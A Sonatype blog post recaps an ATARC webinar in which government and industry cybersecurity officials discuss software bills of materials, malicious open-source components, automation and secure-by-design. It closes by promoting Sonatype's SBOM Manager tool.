News and Notes from the Makers of Nexus | Sonatype Blog

Cyber readiness and SBOMs

Written by Aaron Linskens | March 26, 2024

The Advanced Technology Academic Research Center (ATARC) recently hosted the webinar "Unlocking Cyber Readiness with SBOMs," focusing on the essential role of software bills of materials (SBOMs) in enhancing cybersecurity frameworks across various government agencies and private-sector organizations.

The webinar, hosted by ATARC's Kiersten Kotsiuruba, welcomed the following industry experts:

  • Surendra Babu, Acting Chief, Cloud Hosting and Networks Office, Department of Technology Services, Office of the U.S. Courts

  • Brian Fox, Chief Technology Officer (CTO) and co-founder, Sonatype

  • Major Daniel Hawthorne, DevSecOps Lead, ARCYBER Technical Warfare Center, U.S. Army

  • Charles Livingston, Branch Chief, Cybersecurity Risk Management, Office of the Chief Information Officer, U.S. Department of Health and Human Services

  • Elena Peterson, Senior Cybersecurity Researcher, Group Leader, Pacific Northwest National Laboratory, U.S. Department of Energy

The state of modern cybersecurity

Before diving into SBOMs, the discussion kicked off regarding the increasingly complex challenges of managing security vulnerabilities and software supply chain risks.

Surendra Babu, Acting Chief of Cloud Hosting and Networks at the U.S. Courts, described the common reactive approach to cybersecurity, noting a couple high-profile security breaches of the past decade.

"Everybody can correlate to the Equifax breach of 2017. We all know about the SolarWinds related activities," said Babu. "In both of these instances, we tried to address the issue in a reactive way by implementing privileged access management solutions across the board."

Brian Fox, CTO, co-founder of Sonatype and caretaker of Maven Central, added context regarding trends in software supply chain attacks, where bad actors pivoted to targeting developers and development infrastructure to perpetuate their attacks.

"We've seen, over the last handful of years, over 300,000 intentionally malicious components published into the open source ecosystem. These are components that are designed to, as soon as the package manager pulls it down, execute the payload," said Fox. "The intentionally malicious part is a whole new ballgame that requires an entirely different approach to solve. And so this is one of the biggest shifts I've observed over the last 15 years."

SBOMs, automation, and the future of cybersecurity

As the experts found common ground on the fundamental utility of SBOMs, Fox drew a parallel to software composition analysis (SCA).

"The SCA tool space, one that Sonatype has been in since the beginning, has aimed at providing the exact same outcomes that can be achieved with SBOMs, which is better visibility, better tracking, the understanding and preparedness of the complete organizational bill of materials, all of the dependencies in your organization," said Fox. "Having that on hand is game-changing when something like Log4Shell drops."

Charles Livingston, Branch Chief of Cybersecurity Risk Management at the U.S. Department of Health and Human Services, stressed the importance of automation, especially in the context of security threats in a federal environment.

"With the future challenges, automation is very, very, very important. In an agency like mine that's very federated, we have a challenge that one size doesn't fit all." said Livingston. "We need to strive for automation as best we can, because it then affords us the agility we need to deal with cybersecurity threats."

The discussion also looked toward the future of cybersecurity, with a focus on automation and the integration of advanced technologies.

"Automation is key in dealing with the dynamic nature of cyber threats and ensuring continuous monitoring of software components," said Major Daniel Hawthorne, DevSecOps Lead with the U.S. Army Cyber Command. "We should be continuously monitoring what software is in production, and what components are alerting on new vulnerabilities that have been discovered in production that may affect us, taking automated actions based on those things."

The critical path forward

SBOMs serve as critical elements in the current cybersecurity landscape.

In consideration of proactive cybersecurity measures, Elena Peterson, Senior Cybersecurity Researcher and Group Leader at the Pacific Northwest National Laboratory, made a case for secure-by-design.

"The idea of secure-by-design is really taking hold, and that's a good thing for us in cybersecurity. That will make our lives a little bit easier. It'll allow us to work on the next challenge," said Peterson. "In moving forward with executing secure by design, using SBOMs appropriately is a really good path forward for those of us who do cybersecurity."

Fox underscored the critical role of government regulations in expediting SBOM adoption. He emphasized the importance of proactive defense mechanisms, stating, "You need to defend your developers from those intentionally malicious components. Because once they touch them, it's too late — the data may have been actually traded, the backdoors may have been dropped."

He introduced Sonatype SBOM Manager, a tool designed to enhance SBOM creation and management. This solution aims to provide clear visibility into software dependencies and vulnerabilities, thereby strengthening software supply chain security and ensuring compliance along the critical path forward.

Check out a full recording of the webinar to learn more about SBOMs in the context of cybersecurity and DevSecOps.